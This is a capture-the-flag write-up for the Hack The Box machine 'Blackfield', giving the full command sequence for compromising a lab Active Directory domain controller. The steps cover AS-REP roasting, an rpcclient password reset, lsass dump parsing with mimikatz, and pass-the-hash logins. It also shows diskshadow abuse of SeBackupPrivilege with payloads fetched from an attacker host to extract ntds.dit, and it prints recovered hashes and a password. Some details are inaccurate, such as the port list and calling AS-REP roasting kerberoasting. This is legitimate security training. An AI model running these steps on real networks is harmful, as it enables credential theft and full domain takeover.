Blackfield-HTB
Summary
Blackfield is the Hack The Box Hard-Level box. We get login into smb shares and enumerated profiles$ shares. where we got lots of usernames. We used a kerberoasting attack on an active directory to obtain credentials. Then using rpcclient to change credentials for another user allowing us access to their machine. Root involved abusing the SeBackupPrivilege Using disk shadow to get a root shell.
Methodology
- smb anonymous login
- enum profiles$ share
- Generating TGT for a valid-user
- rpcclient login
- enum privileges && change audit2020 password
- got a lsass.zip file
- unzipping the file and Dumping NTLM hashes by pypykatz
- login as svc_backup –> user flag
- enum privileges –> svc_backup can backup files
- using diskshadow to create a new volume with the alias of c:
- got the ntds.dit
- Saving the registry file SYSTEM
- Cracking the NTLM using secretsdump.py
- Login as administrator –> root flag
Foothold
After the port scan, we discovered two open ports. Port 22 and port 80.
Note: Read the command and flags explanation
- sC: To scan with default Nmap scripts.
- sV (Version detection)
- oA: To write the output file in the three major formats at once.
#Command
$ nmap -sC -sV -oA nmap 10.10.10.192
Looking at the Nmap result we see that kerberos is running and the domain for the machine is BLACKFIELD.local.
First, we enumerated smb shares using the smbclient command.
#Command
$ smbclient -L //10.10.10.192 -N
We notice the 2 shares forensic and profiles$ look interesting. We got access denied for the forensic share so we move on to the profiles$ share.
#Command
$ smbclient //10.10.10.192/profiles$ -N
We got a long list of user names. If you notice the usernames. Every username contains the first alphabetic character in the sequence of (A to Z). We have to filter those usernames which do not have the first character in an alphabetic sequence. After selecting usernames we finally got 9 usernames.
AS-REP
Since we now have a list of users we can use the Script GetNPUsers.py from the impacket library which carries out a kerberoasting attack to try and get the TGT hash. We used the username SUPPORT.
As we already have the domain name blackfield.local we use that for the command.
We used GetNPUsers.py to check which user has the property Do not require Kerberos pre-authentication set (DONT_REQUIRE_PREAUTH) bit set. If this bit is set we can easily retrieve a TGT ( Ticket Granting Ticket) for that user without having to execute Kerberos pre-authentication.
Kerberos Authentication is the first step for the Pre-Authentication method, it’s main purpose is to stop Brute-Force password guessing attacks. Through Pre-Auth a user will enter his credentials that will be used to encode a timestamp and the Domain Controller will decode it to verify that the correct credential was used. If the DC verifies okay it will issue a TGT. nevertheless, if Pre-authentication is disabled it can allow an intruder to request a ticket for any user and the DC would simply return a TGT
ASREP Roast: The script GetNPUsers.py can be used from a Linux machine in order to harvest the non-preauth AS_REP responses.
#Command
$ python /opt/impacket/examples/GetNPUsers.py blackfield.local/support -dc-ip 10.10.10.192 -format hashcat -outputfile hashes.asreproast -no-passAfter getting a TGT ticket we used the John the ripper tool to crack the hash.
#Command
$ john — wordlist=/usr/share/wordlists/rockyou.txt hash
John the ripper gave us the password ‘#00^BlackKnight’. Now we will log-in to the SYSVOL share using the Support username.
#Command
$ smbclient \\\\10.10.10.192\\SYSVOL -U support
After cracking the password we use this password to login in with rpcclient.
#Command
$ rpcclient -U support 10.10.10.192
We query the username audit2020 and we can change the password of this user.
#Command
$ queryuser audit2020
In order to change a password, you need to use the setuserinfo2 command:
#Command
$ setuserinfo2 audit2020 5 'rohit
Reference:
Login with new creds into forensic shares.
#Command
$ smbclient \\\\10.10.10.192\\forensic -U audit2020We copied all the files into our system using few commands:
# Command
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
After enumerating all the files. We come to know about lsass.zip file. I unzip this file and got lsass.DMP file.
DMP extension is a memory dump file that created when the program crashes.
So we can dump some useful information like NTLM hash from this file using Mimiatiz. I used my windows system to dump this file.
# Command
#privilege::debug#sekurla::minidump C\Users\ROHIT\Downloads\x64\lsass.DMP#sekurla::logonpasswords
Now we have svc_backup user hash. We log in with the evil-winrm tool. We got our first user flag.
#Command
#./evil-winrm.rb -i 10.10.10.192 -u svc_backup -H ‘9658d1d1dcd9250115e2205d9f48400d’
Privilege Escalation
After checking the user’s privileges, found out that SeBackupPrivilege is enabled.
What is disk shadow?
DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.
What is ntds.dit?
All data in Active Directory is stored in the file ntds.dit (by default located in C:\Windows\NTDS\) on every domain controller. Amongst other kinds of information, “the dit” contains user accounts and their password hashes, which can be used by an adversary in other stages of their attack.
#Command
$ whoami /priv
We have the SeBackupPrivilege privilege. This gives us the right to create a shadow copy of the NTDS file that contains credentials. After we create a copy, we cannot simply extract the required file.
Let’s make a shadow copy. Let’s create a file with the following content.
SET CONTEXT PERSISTENT
begin backup
add volume c: alias evil
create
expose %evilcopy% z:Saved script.txt
#Command
$ Invoke-WebRequest “http://10.10.14.11:8000/dis.txt" -OutFile c:\Windows\Temp\script.txt
Shadow copy
#Command
$ diskshadow /s script.tx
Now we need to upload and import two DLL to impersonate a backup software :
#Command
$ Invoke-WebRequest “http://10.10.14.11:8000/SeBackupPrivilegeUtils.dll" -OutFile c:\Windows\Temp\SeBackupPrivilegeUtils.dll$ Invoke-WebRequest “http://10.10.14.11:8000/SeBackupPrivilegeCmdLets.dll" -OutFile c:\Windows\Temp\SeBackupPrivilegeCmdLets.dll
Reference:
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Then, we copy ntds.dit from the shadow copy to our temp directory and download it :
#Command
$ Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit C:\windows\temp\nttds.dit
We also dump 2 files.
#Command
$ reg.exe save HKLM\SAM C:\Windows\Temp\sam.save
$ reg.exe save HKLM\SYSTEM C:\Windows\Temp\system.save
We downloaded all three files i.e. sam.save, system.save, and ntds.dit.
#Command
$ download sam.save
$ download system.save
$ download ntds.dit
We used a secret dump python script to dump the hashes.
#Command
$ impacket-secretsdump -sam sam.save -system system.save -ntds ntds.dit LOCAL
Reference:
https://www.bordergate.co.uk/extracting-windows-credentials-using-native-tools/
After getting all the hashes we will use the administrator hash.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
We can use evil win-rm tool or psexec python script. Here I used psexex python script.
#Command
$ ./psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee Administrator@10.10.10.192
And we successfully got the root shell.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842
